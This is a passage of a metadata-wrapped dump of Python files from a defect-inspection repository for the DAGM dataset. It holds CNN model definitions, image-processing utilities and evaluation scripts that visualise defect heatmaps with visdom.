num_classes=12):\n self.inplanes = 1\n super(ConvNetJK, self).__init__()\n \n# self.maxPool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1, return_indices=True)\n self.maxPool = nn.MaxPool2d(kernel_size=2, stride=2) \n \n self.layer1 = self._make_layer(block, 16*k, layers[0], stride=1)\n self.layer2 = self._make_layer(block, 32*k, layers[1], stride=1)\n self.layer3 = self._make_layer(block, 64*k, layers[2], stride=1)\n self.layer4 = self._make_layer(block, 128*k, layers[3], stride=1)\n \n h = int(input_size[1]/16)\n w = int(input_size[2]/16)\n self.fc1 = nn.Linear(128*k*h*w, 1024, bias=False)\n self.bn1 = nn.BatchNorm2d(1024)\n self.relu = nn.ReLU(inplace=True)\n \n self.fc2 = nn.Linear(1024, num_classes)\n \n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n# for m in self.modules():\n# if isinstance(m, nn.Conv2d):\n# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n# elif isinstance(m, nn.BatchNorm2d):\n# nn.init.constant_(m.weight, 1)\n# nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n\n layers = []\n layers.append(block(self.inplanes, planes, stride))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, isGPU=True): \n \n l1 = self.layer1(x) \n \n pool1 = self.maxPool(l1)\n# print(pool1.size())\n l2 = self.layer2(pool1) \n \n pool2 = self.maxPool(l2)\n# print(pool2.size()) \n l3 = self.layer3(pool2) \n \n pool3 = self.maxPool(l3)\n \n out = self.layer3(pool3) \n \n out = self.maxPool(out)\n# print(pool3.size()) \n out = out.view(out.size(0), -1) \n out = self.fc1(out)\n out = self.bn1(out)\n out = self.relu(out) \n# print(out.size()) \n out = self.fc2(out)\n\n return out\n\ndef Conv12k4(input_size, label_size, **kwargs):\n \"\"\"Constructs a ResNet-18 model.\n \n Args:\n \n \"\"\"\n model = ConvNetJK(OneConvBlock, [2, 3, 4, 3], k=4, input_size=input_size,\n num_classes=label_size, **kwargs) \n return model"
},
{
"alpha_fraction": 0.5363360047340393,
"alphanum_fraction": 0.5598231554031372,
"avg_line_length": 28.557376861572266,
"blob_id": "d9d55b78a8727e8f4eafadc7fdc80d0edbf9940a",
"content_id": "e80449ddf8596824d4c13f2a772720d6a2969f12",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3651,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 122,
"path": "/DAGM/JK_image.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nUTIL for image processing (v0.1)\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport glob\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\n\ndef getImagesNumberOrder(path, format='png'): # input : path # output : imgList # path안의 이미지들을 리스트로 만들어준다.\n import re\n numbers = re.compile(r'(\\d+)')\n def numericalSort(value):\n parts = numbers.split(value)\n parts[1::2] = map(int, parts[1::2])\n return parts\n\n imgList = []\n for filepath in sorted(glob.glob(path + \"/*.\"+format), key=numericalSort): # make a image list with images in path\n# img = Image.open(filepath) \n# keep = img.copy()\n# imgList.append(keep) \n# img.close()\n img = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n imgList.append(img)\n return imgList\n\ndef getImages(path, format='png'): # input : path # output : imgList \n imgList = []\n for filepath in glob.glob(path + \"/*.\"+format): # make a image list with images in path\n# img = Image.open(filepath) \n# keep = img.copy()\n# imgList.append(keep) \n# img.close()\n img = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n imgList.append(img)\n return imgList\n\ndef getImages2(path, format='PNG'): # input : path # output : imgList \n imgList = []\n for filepath in glob.glob(path + \"/*.\"+format): # make a image list with images in path\n# img = Image.open(filepath) \n# keep = img.copy()\n# imgList.append(keep) \n# img.close()\n img = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n imgList.append(img)\n return imgList\n\ndef cvRotateImg(img, angle): \n rows = img.shape[0]\n cols = img.shape[1]\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n image = cv2.warpAffine(img,M,(cols,rows))\n return image\n\n# data augmentation \ndef dataAugmentation(image):\n Xli = []\n \n verticalFlip = cv2.flip(image,1) # vertical flip \n for i in range(1, 5): \n augmentedImg1 = cvRotateImg(image, 90*i)\n augmentedImg2 = cvRotateImg(verticalFlip, 90*i)\n Xli.append(augmentedImg1) \n Xli.append(augmentedImg2) \n \n return Xli\n\n\ndef HWC2toC2HW(image): \n r = image[:,:,0]\n g = image[:,:,1]\n return np.array([r,g]) \n\ndef C2HWtoHWC2(image): \n tempImg = np.zeros([image.shape[1], image.shape[2], image.shape[0]])\n tempImg[:,:,0] = image[0,:,:]\n tempImg[:,:,1] = image[1,:,:]\n return tempImg \n\ndef HWC3toC3HW(image): \n r, g, b = cv2.split(image)\n# r = image[:,:,0]\n# g = image[:,:,1]\n# b = image[:,:,2]\n return np.array([r,g,b]) \n\ndef HWC4toC3HW(image): \n r, g, b, a = cv2.split(image)\n# r = image[:,:,0]\n# g = image[:,:,1]\n# b = image[:,:,2]\n return np.array([r,g,b]) \n\ndef C3HWtoHWC3(image): \n r = image[0,:,:]\n g = image[1,:,:]\n b = image[2,:,:]\n return cv2.merge((r,g,b))\n\ndef GRAY2HeatMap(image):\n # a colormap and a normalization instance\n cmap = plt.cm.jet\n norm = plt.Normalize(vmin=image.min(), vmax=image.max()) \n heatmap =cmap(norm(image))\n# r, g, b, a = cv2.split(heatmap) \n# return cv2.merge((r,g,b))\n return heatmap\n\n \n "
},
{
"alpha_fraction": 0.5385835766792297,
"alphanum_fraction": 0.5647553205490112,
"avg_line_length": 32.806968688964844,
"blob_id": "519bf1556f47044a15c5acb1db480fcbd1313375",
"content_id": "33b7fb7d6a0e392dcf6af51992c242394088534f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12609,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 373,
"path": "/DAGM/Run_Ensemble_CNN/dagm_ensemble_evaluation_CNN.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport time, sys, os\nimport glob\nsys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport math\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\nimport tensorflow as tf\nimport torch\nimport torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n#from pytorch_classification.utils import Bar, AverageMeter\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\n\n\n#sys.path.insert(0, 'networks')\nsys.path.append(\"networks\") # parent directory\n#sys.path.append(\"../JK\") # parent directory\n#sys.path.append(\"preTrained_models\")\n#sys.path.insert(0, 'networks')\n\n#import util_image\n#sys.path.append(\"../../ML_utils\") # parent directory\nsys.path.append(\"..\")\nimport JK_image \n\ndef resizedResult( blockSize, outputSize, probs, predictions):\n nRows = int(outputSize[0]//blockSize[0])\n nCols = int(outputSize[1]//blockSize[1])\n blockH = blockSize[0]\n blockW = blockSize[1]\n height = outputSize[0]\n width = outputSize[1]\n \n result = np.zeros([height,width]) \n for colNo in range(0, nCols):\n for rowNo in range(0, nRows): \n index = rowNo+colNo*nRows\n classNo = predictions[index] \n if classNo>=6:\n result[blockH*rowNo:blockH*(1+rowNo), blockW*colNo:blockW*(1+colNo)] = 1\n \n return cv2.resize(result, outputSize, interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n\ndef resizedResult2( blockSize, outputSize, probs, predictions):\n nRows = int(outputSize[0]//blockSize[0])\n nCols = int(outputSize[1]//blockSize[1])\n blockH = blockSize[0]\n blockW = blockSize[1]\n height = outputSize[0]\n width = outputSize[1]\n \n result = np.zeros([height,width]) \n for colNo in range(0, nCols):\n for rowNo in range(0, nRows): \n index = rowNo+colNo*nRows\n classNo = predictions[index] \n if classNo>=6:\n result[blockH*rowNo:blockH*(1+rowNo), blockW*colNo:blockW*(1+colNo)] = probs[index]\n \n return cv2.resize(result, outputSize, interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n\ndef resizedResult3( blockSize, outputSize, probs, predictions):\n nRows = int(outputSize[0]//blockSize[0])\n nCols = int(outputSize[1]//blockSize[1])\n \n result = np.zeros([nRows,nCols]) \n for rowNo in range(nRows):\n for colNo in range(nCols):\n index = colNo+rowNo*nCols\n classNo = predictions[index] \n if classNo>=6:\n result[colNo,rowNo] = probs[index] \n else:\n result[colNo,rowNo] = 1.0-probs[index] \n \n return cv2.resize(result, outputSize, interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if isGPU:\n array_torch = Variable(array_torch, volatile=True).cuda()\n else :\n array_torch = Variable(array_torch, volatile=True).cpu()\n return array_torch\n\n\n\n\ndef showResults(inputs, results): \n #===== vizualize dataset =====# \n nOutput = inputs.shape[0]\n for i in range(nOutput): \n \n X = inputs[i]\n result = results[i]\n \n fig, (ax1, ax2) = plt.subplots(1,2, figsize=(8,4))\n p = ax1.pcolormesh(X) \n p = ax2.pcolormesh(result)\n plt.show()\n# filePath = self.resultFolderPath + 'compared_result%d.png' % i\n# plt.imsave(filePath, buffer)\n \ndef showResultsWithLabels(inputs, labels, results): \n #===== vizualize dataset =====# \n nOutput = inputs.shape[0]\n for i in range(nOutput): \n \n X = inputs[i]\n Y = labels[i]\n result = results[i]\n \n fig, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(12,4))\n p = ax1.pcolormesh(X)\n p = ax2.pcolormesh(Y) \n p = ax3.pcolormesh(result)\n plt.show()\n \n \ndef loadModel( path, isGPU):\n \n network = 0 \n try: \n network = torch.load(path, map_location=lambda storage, location: storage) \n# self.network.load_state_dict(torch.load(self.loadParamsPath)) # it loads only the model parameters (recommended) \n print(\"--------\" + path + \" is restored--------\") \n except:\n print(\"--------There are no models.--------\") \n pass\n \n \n if isGPU:\n network.cuda()\n else :\n network.cpu()\n \n return network\n \n\ndef getEnsembleResultCNN(args, Xs, model_li): \n Sigmoid = nn.Sigmoid()\n Softmax = nn.Softmax()\n result_var = 0\n iterNo = 0\n for net in model_li:\n# modelPath = \"preTrained_models/\"+ model[0] + \"/\" + model[1] + '_all.pkl' \n# net = loadModel(modelPath, args.isGPU)\n# net.eval()\n \n output_var = net(Xs)\n output_var = Softmax(output_var)\n net = [] \n if iterNo>0:\n result_var += output_var\n else:\n result_var = output_var\n \n iterNo+=1\n \n result_var /= iterNo \n if args.isGPU:\n result_var = result_var.cpu() \n \n return result_var\n \ndef changeImageToFeature( args, image):\n \n height = image.shape[0]\n width = image.shape[1]\n# print(height, width)\n\n blockC = args.feature_size[0]\n blockH = args.feature_size[1]\n blockW = args.feature_size[2]\n \n \n resultFolderPath = \"./Results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n\n# Xs = np.array(images, dtype=np.float32)/255. \n# Xs = Xs.reshape([-1,1,height,width]) \n \n Xs_np = []\n tempX = image/255.\n for j in range(0, height, blockH):\n for i in range(0, width, blockW): \n# print((i,i+blockW), (j,j+blockH))\n Xs_np.append(tempX[i:i+blockW, j:j+blockH]) \n\n Xs_np = np.array(Xs_np, dtype=np.float32).reshape([-1, blockC, blockH, blockW]) \n# Xs_tensor = torch.from_numpy(Xs_np) \n# dataset = TensorDataset(data_tensor=Xs_tensor, target_tensor=Xs_tensor) \n# test_loader = DataLoader(dataset, batch_size=args.batch_size, shuffle=False) \n \n\n Xs_var = numpyToTorchVariable(Xs_np, isGPU=args.isGPU)\n \n return Xs_var\n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Tensorflow version :\", tf.__version__)\n print(\"Torch version :\", torch.__version__)\n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n settings1 = dotdict({\n 'dataPath' : \"../../../JKcloud/DB_JK/DAGM_dataset\",\n 'DataForEval' : \"DataForEvaluation\",\n 'isGPU' : True, # False, # True,\n 'isLabel' : True,\n 'load_folder_file': [(\"DAGM2_resnetJK0_resnet18v1_32_12\",'recent'),\n# (\"DAGM2_resnetJK0_resnet34v1_32_12\",'recent'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n# (\"DAGM2_resnetJK0_resnet50v1_32_12\",'recent'),\n# (\"DAGM2_resnetJK0_resnet101v1_32_12\",'recent'),\n# (\"DAGM2_resnetJK0_resnet152v1_32_12\",'recent'),\n (\"DAGM2_cnn0_Conv12k4_32_12\",'optimal0'),\n (\"DAGM2_cnn0_Conv12k8_32_12\",'recent')], \n 'feature_size' : [1, 32, 32],\n 'batch_size' : 6,\n })\n \n\n# if useGPU==False and FCN_settings.isGPU==True:\n# FCN_settings.isGPU = False\n# print(\"GPU is not availabe.\")\n# \n# if FCN_settings.isGPU==False:\n# print(\"Runing by CPU\")\n \n # load pre-trained models\n model_li = [] \n for model in settings1.load_folder_file:\n modelPath = \"preTrained_models/\"+ model[0] + \"/\" + model[1] + '_all.pkl' \n net = loadModel(modelPath, settings1.isGPU)\n net.eval() \n model_li.append(net) \n \n images = JK_image.getImages2(\"./DataForEvaluation\")\n height = images[0].shape[0]\n width = images[0].shape[1]\n\n blockC = settings1.feature_size[0]\n blockH = settings1.feature_size[1]\n blockW = settings1.feature_size[2]\n \n # Defect inspection by FCN \n results = []\n for image in images:\n \n # (1, 512, 512, 1) to (-1, 1, 32, 32)\n Xs_var = changeImageToFeature(settings1, image) \n \n # get the result by CNN ensenble\n cnn_result = getEnsembleResultCNN(settings1, Xs_var, model_li)\n \n probs, predictions = torch.max(cnn_result, 1)\n # print(probs, predictions)\n probs = probs.data.numpy()\n predictions = predictions.data.numpy() \n \n resized_img = resizedResult3((blockH,blockW), (512,512), probs, predictions)\n \n results.append(resized_img)\n \n results = np.array(results, dtype=\"float\") \n \n\n \n \n #===== Visualize color results ===========================================================================\n import visdom\n vis = visdom.Visdom() \n visualizeTool = \"visdom\" # matplotlib | visdom \n visualType = \"heatmap\" # heatmap\n \n if visualType==\"gray\":\n results = np.reshape(results, [-1, 1, height, width])\n vis.images(results, nrow=3)\n \n elif visualType==\"heatmap\":\n \n results = np.reshape(results, [-1, height, width])\n imagesC3 = []\n cnn_resultsC3 = []\n fcn_resultsC3 = []\n for i in range(results.shape[0]):\n # print(results[i].shape)\n if visualizeTool == \"visdom\":\n # imagesC3.append( JK_image.HWC3toC3HW(cv2.cvtColor(images[i], cv2.COLOR_GRAY2RGB) ) ) \n cnn_resultsC3.append( JK_image.HWC4toC3HW(JK_image.GRAY2HeatMap(results[i]) ) )\n # fcn_resultsC3.append( JK_image.HWC4toC3HW(JK_image.GRAY2HeatMap(fcn_results[i]) ) )\n \n elif visualizeTool == \"matplotlib\":\n # imagesC3.append( cv2.cvtColor(images[i], cv2.COLOR_GRAY2RGB) ) \n cnn_resultsC3.append( JK_image.GRAY2HeatMap(results[i]) ) \n # fcn_resultsC3.append( JK_image.GRAY2HeatMap(fcn_results[i]) ) \n \n \n imagesC3 = np.array(imagesC3, dtype='float')\n cnn_resultsC3 = np.array(cnn_resultsC3, dtype='float')\n fcn_resultsC3 = np.array(fcn_resultsC3, dtype='float') \n \n \n if visualizeTool == \"visdom\":\n # result_set1 = np.concatenate( ( np.concatenate((imagesC3[:3], cnn_resultsC3[:3]), axis=0), fcn_resultsC3[:3] ), axis=0) \n # result_set2 = np.concatenate( ( np.concatenate((imagesC3[3:], cnn_resultsC3[3:]), axis=0), fcn_resultsC3[3:]), axis=0) \n # vis.images(result_set1, nrow=3)\n # vis.images(result_set2, nrow=3)\n vis.images(cnn_resultsC3, nrow=3)\n \n elif visualizeTool == \"matplotlib\":\n \n showHeatMap3(imagesC3[:3], cnn_resultsC3[:3], fcn_resultsC3[:3])\n showHeatMap3(imagesC3[3:], cnn_resultsC3[3:], fcn_resultsC3[3:])"
},
{
"alpha_fraction": 0.5571955442428589,
"alphanum_fraction": 0.5833829045295715,
"avg_line_length": 33.90416717529297,
"blob_id": "c41b1fc07cb098f6665d6acfcfb234ca490fedcf",
"content_id": "0f5ff2f03d6f4191142a7e14d3126e40ebbfffd2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8401,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 240,
"path": "/DAGM/DAGM_CNN_final/dagm_cnn_evaluation_visdom.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport time\nimport glob\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport numpy as np\nimport tensorflow as tf\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\n\nsys.path.append(\"../../ML_utils\") # parent directory\nimport JK_image\n\n\nimport jknet1\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\n#sys.path.append(\"networks\") # parent directory\n\n\ndef detectDefectViaVisdom( args, result_type=1, isResultSave=True):\n \n # images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n \n blockW = args.feature_shape[0]\n blockH = args.feature_shape[1]\n blockC = args.feature_shape[2]\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n \n model_dir = \"models_tensorflow/\"\n if not os.path.exists(model_dir):\n os.mkdir(model_dir) \n checkpoint_dir = model_dir + args.load_folder_file[0]\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n# latest_filename = \"checkpoint_state\"\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n\n saved_graph_file = checkpoint_dir + args.load_folder_file[1] + '.meta'\n saver = tf.train.import_meta_graph(saved_graph_file)\n \n checkpoint = tf.train.get_checkpoint_state(checkpoint_dir, latest_filename=\"checkpoint_state\") \n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Loaded checkpoints %s\" % checkpoint.model_checkpoint_path)\n elif False:\n raise Exception(\"Could not load checkpoints for playback\")\n\n result_images = []\n for imgNo in range(nImages):\n \n# plt.imshow(images[imgNo], cmap='gray')\n# plt.show() \n \n Xs = []\n tempX = images[imgNo]/255.\n for j in range(0, height, blockH):\n for i in range(0, width, blockW): \n# print((i,i+blockW), (j,j+blockH))\n Xs.append(tempX[i:i+blockW, j:j+blockH])\n \n \n Xs = np.array(Xs, dtype=np.float32).reshape([-1, blockW * blockH * blockC])\n \n graph = tf.get_default_graph()\n training = graph.get_tensor_by_name(\"DAGM/training:0\")\n input = graph.get_tensor_by_name(\"DAGM/input:0\")\n# result_prob = graph.get_tensor_by_name(\"prob:0\") \n# Ys_prob = sess.run(result_prob, feed_dict={input:Xs, training:False})\n result = graph.get_tensor_by_name(\"result:0\") \n Ys = sess.run(result, feed_dict={ input:Xs, training:False}) \n \n# Ys[np.where(Ys>=6)] = 1.0\n# Ys[np.where(Ys>=6)] = 1.0\n# Ys = Ys.reshape([16,16]).T\n# \n# result_image = np.full([16, 16], 0) \n result_image = np.zeros([16,16]) \n for i in range(16):\n for j in range(16):\n classNo = Ys[j+i*16] \n if classNo>=6:\n result_image[j,i] = 1\n \n result_image = cv2.resize(result_image, (512,512), interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n result_images.append(result_image)\n \n# plt.imshow(result_image, cmap='gray')\n# plt.show() \n \n images = np.array(images, dtype=\"float\") \n result_images = np.array(result_images, dtype=\"float\") \n# print(result_images.shape)\n# plt.imshow(result_images[0], cmap='gray')\n images = images.reshape([-1,1,512,512]) \n result_images = result_images.reshape([-1,1,512,512])\n\n \n vis = visdom.Visdom() \n \n if result_type==1:\n for i in range(nImages):\n vis.image(result_images[i])\n \n elif result_type==1:\n# results_tensor = torch.cat((X_tensor, Y_tensor), 0) \n results = np.concatenate((images, result_images), axis=0) \n vis.images(images, nrow=6)\n vis.images(result_images, nrow=6)\n vis.images(results, nrow=6) \n \n # kk = out_images.numpy().reshape(-1,512,512)\n # heat = np.hstack([kk[0], kk[1]]).reshape([512,2*512]) \n # vis.heatmap(heat)\n\n elif result_type==2:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n for i in range(nImages): \n inputImg = inputImages_np[i] \n tempInput = JK_image.GRAY2CRGB(inputImg)\n tempInput = cv2.cvtColor(inputImg, cv2.COLOR_GRAY2BGR)\n tempInput = JK_image.HWC3toC3HW(tempInput)\n \n outputImg = outputImages_np[i]\n tempOutput = cv2.cvtColor(outputImg, cv2.COLOR_GRAY2BGR)\n tempOutput = JK_image.HWC3toC3HW(tempOutput)\n tempHeatmap = JK_image.GRAY2HeatMap(outputImg)\n \n tempInput = np.array(tempInput).reshape(-1, 3, height, width)\n tempOutput = np.array(tempOutput).reshape(-1, 3, height, width)\n tempHeatmap = np.array(tempHeatmap).reshape(-1, 3, height, width)\n \n result = np.concatenate((tempInput, tempOutput), axis=0)\n result = np.concatenate((result, tempHeatmap), axis=0)\n vis.images(result, nrow=6)\n \n \n elif result_type==3:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n# inputImages = []\n# outputImages = []\n# heatmapImages = []\n resultImages = []\n for i in range(nImages): \n \n inputImg = JK_image.HWC3toC3HW( cv2.cvtColor(inputImages_np[i], cv2.COLOR_GRAY2RGB) )\n outputGray = JK_image.HWC3toC3HW( cv2.cvtColor(outputImages_np[i] , cv2.COLOR_GRAY2RGB) )\n outputHeat = JK_image.GRAY2HeatMap(outputImages_np[i] )\n \n resultImg = np.concatenate((inputImg, outputGray), axis=0)\n resultImg = np.concatenate((resultImg, outputHeat), axis=0) \n resultImages.append(resultImg)\n \n# inputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(inputImg, cv2.COLOR_GRAY2RGB) ) )\n# outputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(outputImg, cv2.COLOR_GRAY2RGB) ) )\n# heatmapImages.append( util_image.GRAY2HeatMap(outputImg) )\n \n# inputImages = np.array(inputImages).reshape(-1, 3, height, width)\n# outputImages = np.array(outputImages).reshape(-1, 3, height, width)\n# heatmapImages = np.array(heatmapImages).reshape(-1, 3, height, width) \n# results = np.concatenate((inputImages, outputImages), axis=0)\n# results = np.concatenate((results, heatmapImages), axis=0)\n# vis.images(results, nrow=6)\n\n resultImages = np.array(resultImages).reshape(-1, 3, height, width) \n vis.images(resultImages, nrow=3)\n \n# print(\"Input size :\", X_tensor.size())\n# print(\"Output size :\", Y_tensor.size())\n print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Tensorflow version :\", tf.__version__)\n \n # GPU check\n\n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 'load_folder_file': (\"DAGM_jknet1_32/\",'saved_checkpoint-0'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"../DataForEvaluation\",\n 'feature_shape' : (32,32,1),\n })\n \n detectDefectViaVisdom(args, result_type=1) \n \n \n "
},
{
"alpha_fraction": 0.589595377445221,
"alphanum_fraction": 0.6127167344093323,
"avg_line_length": 24.121952056884766,
"blob_id": "972b36e967f09a16783c541354195651e10f29e8",
"content_id": "ee05ff480afd1c974137dbe6a9a4b56a712ba5c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1038,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 41,
"path": "/DAGM/JK_data.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nUTIL for image processing\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport glob\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\n\nclass Data(object):\n def __init__(self):\n self.Xs = np.zeros(1)\n self.Ys = np.zeros(1)\n self.start_batch = 0\n self.end_batch = 0\n self.num_examples = 0\n \n def next_batch(self, batch_size):\n mini_batch = np.random.choice(len(self.Xs), batch_size, replace=False)\n \n# self.end_batch = self.start_batch+batch_size\n# mini_batch = np.arange(self.start_batch, self.end_batch)\n# if self.end_batch!=len(self.images):\n# self.start_batch = self.end_batch\n# else :\n# self.start_batch = 0\n \n return self.Xs[mini_batch], self.Ys[mini_batch]\n "
},
{
"alpha_fraction": 0.48696616291999817,
"alphanum_fraction": 0.504645049571991,
"avg_line_length": 34.68316650390625,
"blob_id": "4d1a043adab81626d303279e1c94b9142269ac0c",
"content_id": "33825a3f8da8d801e52dfac0e16129baeb9dadd8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14440,
"license_type": "permissive",
"max_line_length": 158,
"num_lines": 404,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_model_accuracy_test.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport time, sys, os\nsys.path.append(os.pardir) # parent directory\nimport numpy as np\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n#import tensorflow as tf\nimport torch\nimport torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom pytorch_classification.utils import Bar, AverageMeter\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\n\n\nsys.path.insert(0, 'networks')\n\n\nfrom resnetJK0 import resnet34v1 as Network\n#from cnn0 import Conv12k8 as Network\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\n#import glob\n#import random\n\n# torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, 